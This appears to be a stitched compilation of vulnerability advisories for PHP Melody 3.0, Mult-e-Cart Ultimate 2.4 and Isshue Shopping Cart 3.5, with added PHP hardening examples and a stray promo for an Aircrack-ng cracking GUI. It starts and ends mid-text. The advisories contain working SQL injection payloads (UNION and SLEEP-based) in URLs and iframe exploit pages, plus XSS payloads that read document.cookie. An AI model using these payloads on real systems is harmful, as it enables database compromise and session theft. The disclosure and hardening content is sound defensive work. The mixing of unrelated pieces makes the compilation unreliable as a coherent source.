https://phpmelody.localhost.com:8080/admin/import.php
https://phpmelody.localhost.com:8080/admin/categories.php
https://phpmelody.localhost.com:8080/admin/import-user.php


Solution - Fix & Patch:
=======================
The vulnerabilities can be resolved by the following steps ...
1. Encode, escape or filter the vulnerable moved, keyword and username parameters in the get method requests
2. Restrict all the transmitted parameters by disallowing the usage of special chars
3. Sanitize the status message and error message output to prevent the execution points
4. Alternatively, set up security headers and a web firewall or filter to prevent further exploitation
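Output encoding for the reflection points described in this advisory (status message and the search form's value attribute) and in the SonicOS advisory above (data-* attribute, table cell and the JSON endpoint), as an added PHP example that is neither PHPSUGAR's nor SonicWall's code. The function names, the accepted `moved` directions (`up`/`down`) and the sample input are assumptions constructed for the demonstration; it runs stand-alone with PHP 7.3 or later.

```php
<?php
// Added example, not SonicWall's or PHPSUGAR's code. It rebuilds the two
// reflection points described in these advisories with context-aware output
// encoding: a data-* attribute and table cell (SonicOS connection-failure
// list) and a status message plus a form field's value attribute (PHP Melody).
// Function names, the accepted "moved" values and the sample input are
// constructed for this demonstration.

declare(strict_types=1);

/** Encode a string for HTML text or a double-quoted attribute value. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Vulnerable shape from the advisory: user-controlled values pasted into markup. */
function renderFailureRowUnsafe(string $overrideName, string $commonName): string
{
    return '<td><input type="checkbox" class="failChk" data-override-name="' . $overrideName . '"></td>'
         . '<td class="listItem">' . $commonName . '</td>';
}

/** Hardened: every dynamic value is encoded for the context it lands in. */
function renderFailureRowSafe(string $overrideName, string $commonName): string
{
    return '<td><input type="checkbox" class="failChk" data-override-name="' . h($overrideName) . '"></td>'
         . '<td class="listItem">' . h($commonName) . '</td>';
}

/**
 * JSON that a page will fetch or embed: the JSON_HEX_* flags turn < > & ' "
 * into \uXXXX escapes, so a value cannot close a <script> block or an
 * attribute even if a template later drops it into HTML without encoding.
 */
function jsonForBrowser(array $data): string
{
    return json_encode($data, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

/** Hardened status message for a GET parameter reflected into an alert box. */
function renderMoveStatus(string $category, string $moved): string
{
    // Allow-list first: only the directions the UI actually uses get through
    // (the two values are an assumption; adjust to the real ones).
    if (!in_array($moved, ['up', 'down'], true)) {
        throw new InvalidArgumentException('invalid move direction');
    }
    return '<div class="alert alert-success">Category <strong>' . h($category)
         . '</strong> moved ' . h($moved) . ' a level.</div>';
}

/** Hardened search form: the previous query is echoed back only as an encoded attribute value. */
function renderUsernameInput(string $username): string
{
    return '<input name="username" type="text" class="form-control" value="' . h($username) . '">';
}

/** Check used to show the difference: does the markup contain a live <iframe> element? */
function hasLiveIframe(string $html): bool
{
    return (bool) preg_match('/<iframe\b/i', $html);
}

// Constructed input in the shape the advisories report.
$payload = '"><iframe src=evil.source onload=alert(document.domain)>';

$unsafe = renderFailureRowUnsafe($payload, $payload);
$safe   = renderFailureRowSafe($payload, $payload);

printf("unsafe row has live iframe: %s\n", hasLiveIframe($unsafe) ? 'yes' : 'no');
printf("safe row has live iframe:   %s\n", hasLiveIframe($safe) ? 'yes' : 'no');
echo $safe, PHP_EOL;
echo renderUsernameInput($payload), PHP_EOL;
echo renderMoveStatus('Film & animation', 'up'), PHP_EOL;
echo jsonForBrowser(['name' => $payload]), PHP_EOL;

try {
    renderMoveStatus('Film & animation', $payload);
} catch (InvalidArgumentException $e) {
    echo 'rejected before output: ', $e->getMessage(), PHP_EOL;
}
```

The safe row still carries the full payload text, but as `&quot;&gt;&lt;iframe ...`, which the browser renders as characters rather than parsing as an element; encoding at the output stage is what makes the difference, while the allow-list on `moved` shows the complementary input-side check from step 2 of the fix list.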


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


# Exploit Title: PHP Melody 3.0 - 'vid' SQL Injection
# Date: 2021-10-20
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
# Version: v3

Document Title:
===============
PHP Melody v3.0 - (vid) SQL Injection Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2295

Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/


Release Date:
=============
2021-10-20


Vulnerability Laboratory ID (VL-ID):
====================================
2295


Common Vulnerability Scoring System:
====================================
7


Vulnerability Class:
====================
SQL Injection


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the PHP Melody v3.0 video cms web-application.


Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Full Authentication (Admin/Root Privileges)


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A remote sql-injection vulnerability has been discovered in the PHP Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject or execute their own sql commands to compromise the dbms or
file system of the web-application.

The remote sql injection vulnerability is located in the `vid` parameter of the `edit-video.php` file.
Remote attackers with moderator or admin access privileges are able to execute their own malicious sql commands
via an injected get method request. The vid parameter in the acp ui is not sanitized properly, which allows an
attacker to inject their own sql commands to compromise the web-application and dbms.

Exploitation of the remote sql injection vulnerability requires no user interaction but a privileged moderator or admin account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Video Edit

Vulnerable File(s):
[+] edit-video.php

Vulnerable Parameter(s):
[+] vid


Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by authenticated remote attackers without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Original:
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd&a=4&page=1&filter=added&fv=desc


PoC: Exploitation #1
https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


PoC: Exploitation #2
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--


PoC: Exploit
<html>
<head><title>phpmelody vid sql injection poc</title></head>
<body>
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"></iframe>
<br>
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--"></iframe>
</body>
</html>


Reference(s):
https://phpmelody.localhost:8000/
https://phpmelody.localhost:8000/admin/
https://phpmelody.localhost:8000/admin/edit-video.php


Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps ...
1. Use a prepared statement to build the query
2. Restrict the parameter input to disallow special characters
3. Escape and encode the content to prevent execution of malicious payloads
4. Alternatively, a web application firewall or filter class can be integrated to block further attacks.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to ask for permission.

				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
            
# Exploit Title: Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
# Date: 2021-10-22
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://multecart.com/
# Version: 2.4

Document Title:
===============
Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2306


Release Date:
=============
2021-10-22


Vulnerability Laboratory ID (VL-ID):
====================================
2306


Common Vulnerability Scoring System:
====================================
7


Vulnerability Class:
====================
SQL Injection


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Digital Multivendor Marketplace Online Store - eShop CMS

(Source: https://ultimate.multecart.com/ & https://www.techraft.in/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.


Affected Product(s):
====================
Techraft
Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-10-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Restricted Authentication (Moderator Privileges)


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple classic SQL injection web vulnerabilities have been discovered in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
The web vulnerability allows remote attackers to inject or execute their own SQL commands to compromise the database management system.

The vulnerabilities are located in the `id` parameter of the `view` and `update` functions. The vulnerable modules are `inventory`,
`customer`, `vendor` and `order`. Remote attackers with a vendor shop account are able to exploit the vulnerable `id` parameter to
execute malicious SQL commands. The request method to inject is GET and the attack vector is located on the client side. The remote
vulnerability is a classic ORDER BY SQL injection. The issue is exploitable with either of the two vendor roles or with higher-privileged
roles such as admin.

Exploitation of the remote SQL injection vulnerabilities requires no user interaction, but it does require a privileged vendor or admin user account.
Successful exploitation of the remote SQL injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] inventory/inventory/update
[+] /customer/customer/view
[+] /vendor/vendor/view
[+] /order/sub-order/view-order

Vulnerable Parameter(s):
[+] id


Proof of Concept (PoC):
=======================
The remote sql injection web vulnerabilities can be exploited by remote attackers with privileged backend panel access without user interaction.
For security demonstration or to reproduce the remote sql-injection web vulnerability follow the provided information and steps below to continue.


PoC: Payloads
1' union select 1,2,3,4,@@version--&edit=t
1' union select 1,2,3,4,@@database--&edit=t


PoC: Exploitation
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
-
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5


PoC: Exploit
<html>
<head><title>Mult-E-Cart Ultimate - SQL Injection PoC</title></head>
<body>
<iframe src="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"></iframe><br>
<iframe src="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"></iframe><br>
<iframe src="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"></iframe><br>
<iframe src="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@database--" width="400" height="400"></iframe><br>
<br>
<iframe src="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"></iframe><br>
<iframe src="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"></iframe><br>
<iframe src="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"></iframe><br>
<iframe src="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@version--" width="400" height="400"></iframe>
</body>
</html>


--- SQL Error Exception Handling Logs ---
SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause'
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=1 order by 100--
-
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 in /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php:1299
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1299): PDOStatement->execute()
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yii\db\Command->internalExecute('SELECT * FROM `...')
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yii\db\Command->queryInternal('fetch', NULL)
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yii\db\Command->queryOne()
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yii\db\Query->one(NULL)
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yii\db\ActiveQuery->one()
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multeback\modules\inventory\controllers\InventoryController->findModel('-1'')
#7 [internal function]: multeback\modules\inventory\controllers\InventoryController->actionUpdate('-1'')
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yii\base\InlineAction->runWithParams(Array)
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yii\base\Controller->runAction('update', Array)
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yii\base\Module->runAction('inventory/inven...', Array)
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yii\web\Application->handleRequest(Object(yii\web\Request))
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yii\base\Application->run()
#14 {main}
-
Next yii\db\Exception: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=-1' in /home/test/MulteCart/vendor/yiisoft/yii2/db/Schema.php:678
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1304): yii\db\Schema->convertException(Object(PDOException), 'SELECT * FROM `...')
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yii\db\Command->internalExecute('SELECT * FROM `...')
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yii\db\Command->queryInternal('fetch', NULL)
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yii\db\Command->queryOne()
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yii\db\Query->one(NULL)
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yii\db\ActiveQuery->one()
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multeback\modules\inventory\controllers\InventoryController->findModel('-1'')
#7 [internal function]: multeback\modules\inventory\controllers\InventoryController->actionUpdate('-1'')
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yii\base\InlineAction->runWithParams(Array)
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yii\base\Controller->runAction('update', Array)
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yii\base\Module->runAction('inventory/inven...', Array)
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yii\web\Application->handleRequest(Object(yii\web\Request))
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yii\base\Application->run()
#14 {main}
Debug Array:
[0] => 42000
[1] => 1064
[2] => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
-


Reference(s):
https://multecartultimate.localhost:8080/vendor/vendor/view
https://multecartultimate.localhost:8080/customer/customer/view
https://multecartultimate.localhost:8080/inventory/inventory/update
https://multecartultimate.localhost:8080/order/sub-order/view-order


Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps ...
1. Do not display SQL errors to users other than the admin; instead write them to a local log file outside the panel UI
2. Use a prepared statement to protect the query against further injection attacks
3. Restrict the vulnerable id parameter to disallow special characters in POST and GET requests
4. Encode and escape the id content of GET requests carrying the id parameter
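The prepared-statement, input-restriction and error-handling steps listed here (and the matching list for PHP Melody's `edit-video.php` earlier on this page) are shown below as an added PHP example. It is not code from PHP Melody, Mult-e-Cart or Vulnerability Lab; the table, column and function names are assumptions, and it runs stand-alone on an in-memory SQLite database through PDO (PHP 7.4 or newer). It also covers the case the Mult-e-Cart log calls an ORDER BY injection: sort column and direction are identifiers, which a prepared statement cannot bind, so they go through an allowlist instead.

```php
<?php
// Added example (not code from PHP Melody, Mult-e-Cart or Vulnerability Lab).
// Table, column and function names below are assumptions for illustration.
declare(strict_types=1);

final class VideoRepository
{
    // Sort keys and directions are SQL identifiers, which a prepared statement
    // cannot bind, so request values are mapped through a fixed allowlist.
    private const SORT_COLUMNS = ['added' => 'added_at', 'title' => 'title', 'views' => 'views'];
    private const SORT_DIRS    = ['asc' => 'ASC', 'desc' => 'DESC'];

    private PDO $db;

    public function __construct(PDO $db)
    {
        $this->db = $db;
    }

    /** Vulnerable shape (the pattern behind `WHERE id=-1'` in the log above): value concatenated into SQL. */
    public function findUnsafe(string $vid): ?array
    {
        $row = $this->db->query("SELECT * FROM videos WHERE vid='$vid'")->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    }

    /** Hardened: reject anything outside the id's expected shape, then bind it as a parameter. */
    public function find(string $vid): ?array
    {
        // Assumption: ids look like the 3435b47dd seen in this page's URLs; adjust to the real format.
        if (!preg_match('/^[a-z0-9]{1,16}\z/', $vid)) {
            return null;
        }
        $stmt = $this->db->prepare('SELECT * FROM videos WHERE vid = :vid');
        $stmt->execute([':vid' => $vid]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    }

    /** Listing with user-chosen sort (the filter= and fv= parameters): allowlisted identifiers, bound values. */
    public function listVideos(string $filter, string $fv, int $page, int $perPage = 20): array
    {
        $column = self::SORT_COLUMNS[$filter] ?? 'added_at';
        $dir    = self::SORT_DIRS[strtolower($fv)] ?? 'DESC';
        $stmt = $this->db->prepare("SELECT vid, title FROM videos ORDER BY $column $dir LIMIT :lim OFFSET :off");
        $stmt->bindValue(':lim', $perPage, PDO::PARAM_INT);
        $stmt->bindValue(':off', max(0, $page - 1) * $perPage, PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }
}

// Driver exceptions go to the server log, never to the panel user (fix step 1 above).
function handleEditRequest(VideoRepository $repo, array $get): string
{
    try {
        $row = $repo->find((string) ($get['vid'] ?? ''));
        return $row === null ? 'not found' : 'editing ' . $row['title'];
    } catch (PDOException $e) {
        error_log('edit-video failure: ' . $e->getMessage());
        return 'internal error';
    }
}

if (PHP_SAPI === 'cli') {
    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE videos (vid TEXT PRIMARY KEY, title TEXT, views INTEGER, added_at TEXT)');
    $db->exec("INSERT INTO videos VALUES ('3435b47dd', 'Pilot', 10, '2021-09-01'), ('7a1c9e0f2', 'Episode 2', 5, '2021-09-02')");
    $repo = new VideoRepository($db);

    echo handleEditRequest($repo, ['vid' => '3435b47dd']), PHP_EOL;

    // Constructed hostile input: a quote-and-comment suffix of the kind the PoCs above use.
    $hostile = "x' OR '1'='1";
    var_dump($repo->findUnsafe($hostile) !== null);   // concatenation lets the WHERE condition be rewritten
    var_dump($repo->find($hostile));                  // the shape check stops it before any SQL runs

    // Unknown sort keys fall back to the defaults instead of reaching the ORDER BY clause.
    foreach ($repo->listVideos('100--', 'x', 1) as $row) {
        echo $row['vid'], ' ', $row['title'], PHP_EOL;
    }
}
```

The Mult-e-Cart stack trace shows `findModel('-1'')` producing `WHERE id=-1'`, that is, the raw request value concatenated into the statement. In a Yii2 application the hash-format condition `where(['id' => $id])`, or `findOne()` with an integer-cast id, binds the value as a parameter instead; and the detailed exception page captured in the log is the framework's debug error output, which the first fix step says should not reach panel users.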


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab



Dear reader, are you still struggling with Aircrack-ng's many commands? It is here: the Aircrack-ng graphical front end! It makes operation lighter (and your kidneys more overdrawn).

Installation

cd "Aircrack-ng gui"   # enter the directory

pip install -r requirements.txt   # install dependencies (on Kali most of them are already present)

python3 aircrack-gui.py

User Guide

Startup interface (screenshot)

Scan the network (screenshot)

Capture handshake file (screenshot)

Configure dictionary and handshake capture (screenshot)

Cracking result (screenshot)

Summary

Simply put, it visualizes the Aircrack-ng commands, which is more convenient for novices. If you want finer control over the operation, use the command line.

Attachment Download

Aircrack-ng

Decompression password

Follow the WeChat official account "kali Hacker Notes" and reply "kali666" in the backend to obtain it automatically.

# Exploit Title: Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
# Date: 2021-10-22
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/
# Version: 3.5

Document Title:
===============
Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2284


Release Date:
=============
2021-10-22


Vulnerability Laboratory ID (VL-ID):
====================================
2284


Common Vulnerability Scoring System:
====================================
5.1


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Multi-store eCommerce shopping cart software is the complete solution for eCommerce business management. It is an all-in-one package for website management
with a backend admin panel to manage inventory, orders, products, invoicing & so on. No regular monthly subscription fee is needed; get it through a one-time payment now.
Your eCommerce business frequently changes with the times. All you need is a system that will make your work easier and time-saving. You need the best
eCommerce shopping cart software, one that is flexible, upgradable and affordable. Isshue is a completely secure and fast eCommerce POS system for eCommerce
solutions. Isshue is the best choice for any type of e-commerce business, big or small.

(Copy of the Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the Isshue eCommerce Shopping Cart v3.5 web-application.


Affected Product(s):
====================
bdtask
Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-08-23: Researcher Notification & Coordination (Security Researcher)
2021-08-24: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Moderator Privileges)


User Interaction:
=================
Medium User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Isshue eCommerce Shopping Cart v3.5 web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise
browser-to-web-application requests from the application side.

An input validation web vulnerability has been discovered in the title input fields of the `new invoice`, `customer` & `stock` modules.
The `title` input and parameter allow the injection of malicious script code with a persistent attack vector. The content of the input
and parameter is insecurely validated, which allows remote attackers with privileged user accounts (manager/keeper/admin) to inject
malformed script code that executes on preview. The request method to inject is POST and the attack vector is persistent on
the application side.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
to a malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Edit Title

Vulnerable Input(s):
[+] Title

Vulnerable Parameter(s):
[+] title

Affected Module(s):
[+] stock
[+] customer
[+] invoice


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a keeper account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.


Vulnerable Source:
<div class="row">
<div class="col-sm-12 lobipanel-parent-sortable ui-sortable" data-lobipanel-child-inner-id="azO1Fsrq9M">
<div class="panel panel-bd lobidrag lobipanel lobipanel-sortable" data-inner-id="azO1Fsrq9M" data-index="0">
<div class="panel-heading ui-sortable-handle">
<div class="panel-title" style="max-width: calc(100% - 180px);">"[MALICIOUS INJECTED SCRIPT CODE!]<iframe src="evil.source" onload="alert(document.cookie)"></iframe></div>
<div class="dropdown"><ul class="dropdown-menu dropdown-menu-right"><li><a data-func="editTitle" data-tooltip="Edit title"
data-toggle="tooltip" data-title="Edit title" data-placement="bottom" data-original-title="" title=""><i class="panel-control-icon ti-pencil"></i>
<span class="control-title">Edit title</span></a></li><li>
<a data-func="unpin" data-tooltip="Unpin" data-toggle="tooltip" data-title="Unpin" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-move"></i><span class="control-title">Unpin</span></a></li><li>
<a data-func="reload" data-tooltip="Reload" data-toggle="tooltip" data-title="Reload" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-reload"></i><span class="control-title">Reload</span></a></li><li>
<a data-func="minimize" data-tooltip="Minimize" data-toggle="tooltip" data-title="Minimize" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-minus"></i><span class="control-title">Minimize</span></a></li><li><a data-func="expand"
data-tooltip="Fullscreen" data-toggle="tooltip" data-title="Fullscreen" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-fullscreen"></i><span class="control-title">Fullscreen</span></a></li><li>
<a data-func="close" data-tooltip="Close" data-toggle="tooltip" data-title="Close" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-close"></i><span class="control-title">Close</span></a></li></ul>
<div class="dropdown-toggle" data-toggle="dropdown"><span class="panel-control-icon glyphicon glyphicon-cog"></span></div></div></div>
<form action="https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice" class="form-vertical" id="validate" name="insert_invoice" enctype="multipart/form-data" method="post" accept-charset="utf-8" novalidate="novalidate">
<div class="panel-body">
<div class="row">
<div class="col-sm-8" id="payment_from_1">
<div class="form-group row">
<label for="customer_name" class="col-sm-3 col-form-label">Customer Name <i class="text-danger">*</i></label>
<div class="col-sm-6">
<input type="text" size="100" value="a as" name="customer_name" class="customerSelection form-control ui-autocomplete-input" placeholder="Customer Name" id="customer_name" autocomplete="off">
